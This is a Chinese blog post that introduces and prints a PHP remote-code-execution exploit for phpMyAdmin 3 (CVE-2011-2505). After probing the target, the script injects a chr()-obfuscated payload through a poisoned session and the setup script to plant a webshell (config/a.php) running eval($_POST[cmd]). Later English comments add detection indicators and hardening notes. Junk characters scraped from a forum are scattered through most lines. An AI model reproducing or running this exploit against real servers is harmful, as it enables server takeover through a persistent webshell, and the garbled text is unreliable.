最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,而据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp。由于我搞得晚了,之前已经很多人研究过并写了exp,所以我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php/ _/ _+ d% ?5 _1 i" r
<?php
// Historical proof-of-concept for CVE-2011-2505 (phpMyAdmin 3), kept as a reference
// for what this attack's traffic and on-disk artifacts look like. The whole chain
// stops unless the setup directory "config" exists and is writable (see the author's
// note below and the final failure message), so removing that directory after
// installation defeats it.
# x/ e* m7 B5 n+ d. q8 _print_r('
9 B; S7 q/ h, k3 R9 |) ^2 b+---------------------------------------------------------------------------+1 X* n ^* V2 U; e
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
$ J6 M) |8 B5 f) e' lby oldjun(www.oldjun.com)
1 R7 s- B1 J: Uwelcome to www.t00ls.net1 @; T5 z6 X+ Z& K: M
mail: oldjun@gmail.com( E5 \1 g, x- Y" n; c! G' o# g9 y
Assigned CVE id: CVE-2011-2505* a/ p% d/ ^8 q: X; ~( Y2 L( k/ I( D
+---------------------------------------------------------------------------+! U. A2 w! F" {/ { M: [
');. ^1 Y4 N7 u; ^4 g8 |7 X
4 E+ J6 d d) t0 T9 q5 S/**
. q+ S6 m. y6 u' \, K- V4 T$ P5 ] * working when the directory:"config" exists and is writeable.
$ O9 W, t( {4 B**/6 Z4 [+ u! a( I/ K/ o5 z2 k
// Command-line usage: positional host and base path of the phpMyAdmin install.
2 T2 J; R6 R3 z# |if ($argc < 3) {
) m* F# t8 U* S+ y print_r('* k! O" S J0 d' ]
+---------------------------------------------------------------------------+. s9 l5 B& I% s' D" R8 @6 K* X8 w
Usage: php '.$argv[0].' host path
# U" V- |) [" B3 j( I0 D2 @host: target server (ip/hostname)
/ o. V: v; |, H8 n+ m7 t8 K$ [: bpath: path to pma3
# x% d. k8 L, R$ ~8 IExample:
+ t0 ~" d% b4 x" wphp '.$argv[0].' localhost /pma/& A' x R" c; Z9 m$ X
+---------------------------------------------------------------------------+8 }/ n7 M- _& ]3 w8 ]) `
');
& r. a1 ^8 K, Y/ u- S! s) ? exit;
6 k& I3 k8 c( i ?0 X% k2 G1 p) w6 m}! t# `! E- Y7 _+ L8 A& {
* }& ?( z: G% Y- p. S j
// NOTE(review): neither argument is validated; php_request() concatenates
// $path.$url directly, so $path is expected to end in "/" (as in the Example).
$host = $argv[1];
, P" R/ l6 Y. x% a- p/ S+ C6 t$path = $argv[2];
0 d z/ Q* X9 J1 w7 ]7 {
( c; s6 T; @' v/ p2 D/**
9 Y2 T/ W; s% o, A Y a) J9 Y) E6 ? * Try to determine if the directory:"config" exists
7 C, {7 K# E9 F( ]8 C**/2 T: G% F. y+ x. P7 H& F! ^
// Step 1: probe "config/". Any "404" substring in the raw response (headers
// included) is taken to mean the directory is absent, which is exactly the
// hardening that stops this PoC.
// NOTE(review): strpos() is used as a boolean; a needle at offset 0 is falsy,
// so the idiomatic check would be `!== false`.
echo "[+] Try to determine if the directory:config exists....\n";9 m8 u: c1 A) l; n. R0 Z
$returnstr=php_request('config/');4 n& h0 U6 d! u4 z; X
if(strpos($returnstr,'404')){, [: t) P" W0 g% a1 _4 P; i
exit("[-] Exploit Failed! The directory:config do not exists!\n");! H ?6 I6 U* u+ I/ O- S7 T D
}0 u$ v/ I" ]8 i' n% m h( j$ U
8 `) U4 N W. ^2 p6 Y3 x1 l
/**2 H2 B i7 Y' j
* Try to get token and sessionid+ e' N" ]: j: i3 ^+ Q
**/
// Step 2: fetch index.php and pull the phpMyAdmin session cookie value
// ($resp[1]) and the form token ($resp[3]) out of the response with one regex.
// NOTE(review): if the regex does not match, $resp[1]/$resp[3] are undefined
// (PHP notices) and the if() below exits without saying which one was missing.
7 x0 p2 G, i- B% Z% N: Gecho "[+] Try to get token and sessionid....\n";
3 }" C6 d& i/ Y* G& y4 C6 O) R$result=php_request('index.php');) u8 S" b6 ?' d. l) K4 e+ d) {
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);$ B: R& Z h" n" [
$token=$resp[3];
0 g1 X, n; e) R! o$ Q( ?$sessionid=$resp[1];# z+ v8 J: {- S" a* s! O) t
if($token && $sessionid){
// NOTE(review): the two messages below look forum-garbled ("tokentoken",
// "Session IDsessionid"); presumably they originally interpolated $token and
// $sessionid.
6 u2 v3 f4 S* |" c J Y. t echo "[+] tokentoken\n";1 @' D7 w M1 M R0 U% A
echo "[+] Session IDsessionid\n";
( F* E6 @: c. k. X; T6 O, l; [}else{
`" v9 H. g* Y/ s exit("[-] Can't get token and Session ID,Exploit Failed!\n"); K+ q( F! r0 {: } c6 u" P/ K
}
; q, U+ _1 Z7 g3 S! e9 k3 O1 U. q7 k2 i$ y# Q+ H; \: U
/**
+ ]) X3 ?) I* A1 a/ \ i3 `9 w1 C7 r6 M$ p * Try to insert shell into session7 R% L. B! R/ ]- T
**/
// Step 3 (the CVE-2011-2505 primitive): a request carrying "session_to_unset"
// together with a "_SESSION[...]" query parameter gets an attacker-chosen key
// written into the server-side session (per the author's step comment); the
// value carries the payload that step 5 later looks for in config/config.inc.php.
// Detection / forensics indicators: web-server log lines for db_create.php (the
// author's trailing comment says almost any top-level pma3 script works) whose
// query string contains "_SESSION[" or "session_to_unset=".
6 _" n% ^/ @* |" m# Zecho "[+] Try to insert shell into session....\n";
- V4 i+ N1 \4 U' D0 o% h7 mphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here." }# n: D" t. @/ Z+ b( `- ]
% a2 @0 q2 I( {
/**
6 V. ?6 T: T3 K" [& W$ b" j2 u2 g * Try to create webshell
2 L* g7 P2 E* {, @/ y**/
// Step 4: submit the setup form (setup/config.php, submit_save=Save) under the
// poisoned session cookie; evidently the setup script then writes the session's
// ConfigFile out as config/config.inc.php, which is what step 5 reads back.
// Indicators: an unexpected write to config/config.inc.php and the appearance of
// config/a.php (see the success message below).
1 Z7 a- I( |% H' R/ j& r V5 Vecho "[+] Try to create webshell....\n";
8 h8 \6 G- _ z$ F7 ]) e* @# Lphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
' I* @6 J! g: |4 E0 a/**
0 e, R' U/ G9 e; t# {8 r" u * Try to check if the webshell was created successfully( [4 ]8 F; i+ ?
**/
// Step 5: request config/config.inc.php and look for the "t00ls" marker,
// presumably echoed by the injected code; finding it means the generated file
// was served and executed as PHP. The same strpos()-as-boolean caveat as in
// step 1 applies.
A5 s1 T. Q; r3 q2 P* Decho "[+] Try to check if the webshell was created successfully....\n";2 o$ w& R$ H9 `% [! p0 e
$content=php_request('config/config.inc.php');. z% U3 s! n0 V" [9 d
if(strpos($content,'t00ls')){
4 s* h- q W: F8 z; F7 m6 z2 c" M echo "[+] Congratulations! Expoilt successfully....\n";
' H! |* E. A: F: o; F$ \6 } echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! s3 s; q) \% M& E9 j: Q* f6 B}else{
4 X) e7 k- }8 |- W2 R; ~ exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");+ e# X- P' P* _+ }+ Y
}
/**
 * Minimal raw-socket HTTP/1.1 client used by the steps above.
 *
 * @param string $url    path appended verbatim to the global $path (no URL encoding)
 * @param string $data   urlencoded request body; when non-empty the method becomes POST
 *                       and Content-Type / Content-Length headers are added
 * @param string $cookie raw Cookie header value, sent as-is when non-empty
 * @return string the whole raw response (status line, headers and body), read until
 *                the peer closes the connection
 *
 * Notes for readers: the target host and base path arrive via `global`; the
 * connection is plain HTTP on a hard-coded port 80 (fsockopen emits a PHP warning
 * on failure, which is not suppressed); a failed connect prints a message and
 * die()s instead of returning; "Connection: Close" is what lets the read loop
 * terminate on feof().
 */
function php_request($url,$data='',$cookie=''){
) b! O1 T% o. M global $host, $path;" L/ q5 i$ k) J% Y: e6 W8 ^
// Truthiness decides the method, so a body of "0" would still be sent as GET.
4 T0 H, W1 y7 D4 v! P6 @ $method=$data?'POST':'GET';
1 ?/ W U+ T& W; C- Y, v& C
// Build the request by hand; $path.$url is not encoded or normalised.
2 X# Y2 l6 {9 x+ z $packet = $method." ".$path.$url." HTTP/1.1\r\n";5 L5 c8 V6 ?- g$ p
$packet .= "Accept: */*\r\n";
5 p1 ~3 a* h6 F# R: x$ f $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";! }/ M8 S$ ^% N& A; l9 F
$packet .= "Host: $host\r\n";. c- s4 U9 }8 u/ G, r: l3 b
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";. {% T) C4 D- o1 ?* x5 l4 Y; h P+ U
// strlen() is byte length, which is what Content-Length requires.
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";. @' k) u; B, I' s; D
$packet .= $cookie?"Cookie: $cookie\r\n":"";
% ` U) l6 u/ d& Z $packet .= "Connection: Close\r\n\r\n";* b: r7 H* g V" e) h
$packet .= $data?$data:"";0 Y& c( |, X7 r7 b0 p
" O! d5 E* C# ?8 X0 u$ ^
// Port 80 only; gethostbyname() returns the name unchanged if resolution fails.
$fp = fsockopen(gethostbyname($host), 80);. I$ q. B: ~( c( B3 E/ B
if (!$fp) {
. ]* K2 u" l$ u+ l, e% L' l$ Y# I8 c echo 'No response from '.$host; die;
% h7 A- a# {! f }) D; J$ R" Z: c$ C1 }" S6 X! V( i
fputs($fp, $packet);/ ? R" c3 U# v
0 t8 g8 b( U/ ]5 M+ e. A
// Accumulate the raw response until the server closes the socket.
$resp = '';# R; y% u+ `4 U2 e) x% R
7 [& K/ U) F# |4 } while ($fp && !feof($fp))
/ l( W0 D) [/ c# z7 q $resp .= fread($fp, 1024);
4 k7 h: }) X" |" T+ E/ `% O! c4 H/ o! z: r$ \3 C
return $resp;
1 L# ~3 C! j& O& `}
?> 4 }: X# r) H. F- i9 f